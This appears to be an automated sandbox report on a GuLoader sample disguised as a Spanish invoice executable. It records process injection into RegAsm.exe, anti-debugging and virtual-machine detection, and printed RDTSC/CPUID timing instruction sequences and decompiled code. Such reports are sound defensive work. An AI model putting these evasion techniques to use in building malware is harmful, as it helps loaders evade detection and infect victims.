Play interactive tour

Edit tour

Analysis Report FACTURA Y ALBARANES.exe

Overview

General Information

Sample Name:	FACTURA Y ALBARANES.exe
Analysis ID:	358414
MD5:	0495f304201fbe589c3826bb8e8ab5cd
SHA1:	14dd46d175d5b04c105794c4b41cc5a6fb1fca3f
SHA256:	31970d5ad477b508e0b677485fa10a588b0ece66dbf8eaddee7973977ead6c07
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found potential dummy code loops (likely to delay analysis)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

FACTURA Y ALBARANES.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe' MD5: 0495F304201FBE589C3826BB8E8AB5CD)

RegAsm.exe (PID: 7052 cmdline: 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: RegAsm.exe PID: 7052	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

Uses 32bit PE files

Show sources

Source: FACTURA Y ALBARANES.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

System Summary:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_00401A39	0_2_00401A39
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_004019EC	0_2_004019EC
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_004017F9	0_2_004017F9

Source: FACTURA Y ALBARANES.exe, 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameXanthophane.exe vs FACTURA Y ALBARANES.exe
Source: FACTURA Y ALBARANES.exe	Binary or memory string: OriginalFilenameXanthophane.exe vs FACTURA Y ALBARANES.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: FACTURA Y ALBARANES.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal80.troj.evad.winEXE@4/0@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

File created: C:\Users\user\AppData\Local\Temp\~DFCDCE4BCF2D89DFDA.TMP

Jump to behavior

Source: FACTURA Y ALBARANES.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7052, type: MEMORY

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_00409202 push cs; ret	0_2_00409205
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_0040400A pushad ; ret	0_2_0040400B
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_0040BC24 push edi; retn 0004h	0_2_0040C111
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_004026DF pushad ; retf	0_2_004026E1
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_0040AEA9 push edi; retn 0004h	0_2_0040C111
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_00404D33 push FFFFFFBFh; ret	0_2_00404D35
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_004083E6 push FFFFFFAAh; iretd	0_2_004083F1
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_02212828 push ecx; ret	0_2_02212829
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Code function: 0_2_0221458D push edi; iretd	0_2_0221458E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B057AB push ebx; retf	13_2_00B057AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B03963 push 00000013h; iretd	13_2_00B0397F

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B017E4	13_2_00B017E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B017C7	13_2_00B017C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B01338	13_2_00B01338

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

RDTSC instruction interceptor: First address: 00000000022126E7 second address: 00000000022126E7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FE598A58588h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test dl, cl 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 jmp 00007FE598A585AEh 0x00000025 clc 0x00000026 cmp ecx, 00000000h 0x00000029 jne 00007FE598A58542h 0x0000002b push ecx 0x0000002c call 00007FE598A585CEh 0x00000031 call 00007FE598A58598h 0x00000036 lfence 0x00000039 mov edx, dword ptr [7FFE0014h] 0x0000003f lfence 0x00000042 ret 0x00000043 mov esi, edx 0x00000045 pushad 0x00000046 rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	RDTSC instruction interceptor: First address: 00000000022126E7 second address: 00000000022126E7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FE598A58588h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test dl, cl 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 jmp 00007FE598A585AEh 0x00000025 clc 0x00000026 cmp ecx, 00000000h 0x00000029 jne 00007FE598A58542h 0x0000002b push ecx 0x0000002c call 00007FE598A585CEh 0x00000031 call 00007FE598A58598h 0x00000036 lfence 0x00000039 mov edx, dword ptr [7FFE0014h] 0x0000003f lfence 0x00000042 ret 0x00000043 mov esi, edx 0x00000045 pushad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe	RDTSC instruction interceptor: First address: 0000000002212842 second address: 0000000002212842 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FE598A5A90Ah 0x0000001d popad 0x0000001e call 00007FE598A5849Dh 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00B02AAE rdtsc

13_2_00B02AAE

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 90% for more than 60s

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00B02AAE rdtsc

13_2_00B02AAE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B0440E mov eax, dword ptr fs:[00000030h]	13_2_00B0440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B05046 mov eax, dword ptr fs:[00000030h]	13_2_00B05046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B0259E mov eax, dword ptr fs:[00000030h]	13_2_00B0259E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B01338 mov eax, dword ptr fs:[00000030h]	13_2_00B01338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B01959 mov eax, dword ptr fs:[00000030h]	13_2_00B01959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00B0195C mov eax, dword ptr fs:[00000030h]	13_2_00B0195C

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B00000

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA Y ALBARANES.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'

Jump to behavior

Source: FACTURA Y ALBARANES.exe, 00000000.00000002.917130832.0000000000D90000.00000002.00000001.sdmp, RegAsm.exe, 0000000D.00000002.916933582.0000000001380000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: FACTURA Y ALBARANES.exe, 00000000.00000002.917130832.0000000000D90000.00000002.00000001.sdmp, RegAsm.exe, 0000000D.00000002.916933582.0000000001380000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: FACTURA Y ALBARANES.exe, 00000000.00000002.917130832.0000000000D90000.00000002.00000001.sdmp, RegAsm.exe, 0000000D.00000002.916933582.0000000001380000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: FACTURA Y ALBARANES.exe, 00000000.00000002.917130832.0000000000D90000.00000002.00000001.sdmp, RegAsm.exe, 0000000D.00000002.916933582.0000000001380000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00B02AAE cpuid

13_2_00B02AAE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection112	Virtualization/Sandbox Evasion311	OS Credential Dumping	Security Software Discovery721	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection112	LSASS Memory	Virtualization/Sandbox Evasion311	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358414
Start date:	25.02.2021
Start time:	15:36:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FACTURA Y ALBARANES.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@4/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 56.1% (good quality ratio 31.8%) Quality average: 39.5% Quality standard deviation: 38.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe VT rate limit hit for: /opt/package/joesandbox/database/analysis/358414/sample/FACTURA Y ALBARANES.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.360541353236755
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURA Y ALBARANES.exe
File size:	73728
MD5:	0495f304201fbe589c3826bb8e8ab5cd
SHA1:	14dd46d175d5b04c105794c4b41cc5a6fb1fca3f
SHA256:	31970d5ad477b508e0b677485fa10a588b0ece66dbf8eaddee7973977ead6c07
SHA512:	a2aa4a4f9adc6e7a19fca998313d680f6342069e46f364ac34a8505a4d1ab8e2986f7fadd0361c1cbfcc42781f724b847269aead5d6a3c867d81bb1aac43b2d1
SSDEEP:	1536:nmKXDSk33jANL/9pJpMplDB1Mc1pu9oGzceKMP3gX:mKzSkHENLzJIZ51A9rzbKSg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L.....KL.....................0....................@................

File Icon


Icon Hash:	b038b57269717938

Static PE Info

General
Entrypoint:	0x401394
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4C4BD818 [Sun Jul 25 06:22:16 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f783b7553c2ee07b6bd756ebd3705f2c

Entrypoint Preview

Instruction
push 0040A3D0h
call 00007FE598943DC5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
jns 00007FE598943DDEh
xchg eax, esp
jmp 00007FE554E2594Eh
out dx, eax
xchg dword ptr [edx], esi
mov ebp, 006646DBh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], bh
pop dword ptr [616E4103h]
je 00007FE598943E41h
insd
jnc 00007FE598943E04h
add byte ptr [eax], cl
inc ecx
add byte ptr [eax], ah
or byte ptr [ecx+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or dh, byte ptr [ebx+edx*2-7FE85B3Dh]
xlatb
inc ebx
mov word ptr [eax+ebp*4-29h], seg?
salc
je 00007FE598943DF3h
in eax, dx
fidivr dword ptr [edi]
popad
ret
sbb dword ptr [ebp+6D46834Ah], ebx
dec edx
sub dword ptr [eax], 4F3A6B98h
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp dword ptr [edi+0C110000h], ecx
add byte ptr [eax], al
add byte ptr [eax+eax], cl
arpl word ptr [edx+6Fh], si
jnc 00007FE598943E45h
arpl word ptr [ebp+74h], si
je 00007FE598943E3Bh
outsb
add byte ptr [di], cl
add dword ptr [edx], ecx
add byte ptr [edx+65h], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xeb64	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xf4e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x11c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe058	0xf000	False	0.374251302083	data	5.83564120416	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0x1210	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xf4e	0x1000	False	0.323486328125	data	3.63151348767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x12c66	0x2e8	data
RT_ICON	0x123be	0x8a8	data
RT_GROUP_ICON	0x1239c	0x22	data
RT_VERSION	0x12120	0x27c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaLenBstrB, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Xanthophane
FileVersion	1.00
CompanyName	Wang
ProductName	Wang Laboratories
ProductVersion	1.00
FileDescription	Wang Laboratories
OriginalFilename	Xanthophane.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FACTURA Y ALBARANES.exe PID: 7104 Parent PID: 5936

General

Start time:	15:36:56
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\FACTURA Y ALBARANES.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	0495F304201FBE589C3826BB8E8AB5CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 7052 Parent PID: 7104

General

Start time:	15:38:21
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\FACTURA Y ALBARANES.exe'
Imagebase:	0x670000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1324 Parent PID: 7052

General

Start time:	15:38:22
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FACTURA Y ALBARANES.exe PID: 7104 Parent PID: 5936 FACTURA Y ALBARANES.exeCOMMON

Executed Functions

Function 0040C16A, Relevance: 283.8, APIs: 151, Strings: 10, Instructions: 2033
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040C16A(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				long long _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				void* _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				signed int _v128;
				intOrPtr _v136;
				signed int _v144;
				char _v152;
				signed int _v160;
				intOrPtr _v168;
				signed int _v176;
				char _v192;
				char* _v200;
				signed int _v208;
				char _v216;
				signed int _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _v308;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
				intOrPtr* _v504;
				signed int _v508;
				intOrPtr* _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr* _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				intOrPtr* _v576;
				signed int _v580;
				intOrPtr* _v584;
				signed int _v588;
				intOrPtr* _v592;
				signed int _v596;
				intOrPtr* _v600;
				signed int _v604;
				signed int _v608;
				intOrPtr* _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
